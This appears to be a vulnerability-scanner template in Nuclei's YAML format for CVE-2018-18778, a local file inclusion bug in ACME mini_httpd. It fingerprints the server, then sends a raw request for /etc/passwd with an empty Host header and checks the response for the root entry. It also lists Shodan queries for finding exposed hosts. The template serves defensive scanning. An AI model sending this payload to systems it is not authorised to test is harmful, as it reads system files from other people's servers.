id: CVE-2018-18778 info: name: ACME mini_httpd <1.30 - Local File Inclusion author: DhiyaneshDK,dogasantos severity: medium description: ACME mini_httpd before 1.30 is vulnerable to local file inclusion. impact: | Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server. remediation: | Upgrade ACME mini_httpd to version 1.30 or later to mitigate this vulnerability. reference: - https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/ - http://www.acme.com/software/mini_httpd/ - https://nvd.nist.gov/vuln/detail/CVE-2018-18778 - https://github.com/0xT11/CVE-POC - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2018-18778 cwe-id: CWE-200 epss-score: 0.39341 epss-percentile: 0.97248 cpe: cpe:2.3:a:acme:mini-httpd:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: acme product: mini-httpd shodan-query: - 'Server: mini_httpd && 200' - cpe:"cpe:2.3:a:acme:mini-httpd" - "server: mini_httpd && 200" tags: cve,cve2018,lfi,mini_httpd,acme flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}" matchers: - type: word part: header words: - "Server: mini_httpd" internal: true - raw: - |+ GET /etc/passwd HTTP/1.1 Host: unsafe: true matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4b0a00483046022100e849e594ed1648ce02d93bdd84f710d963ce4f68659ff9fe8fa70068bec9b6d702210091ba093250cf441932d859694d5fd95315c5a0df7f0c68f213c9cc8bfe55b9e2:922c64590222798bb761d5b6d8e72950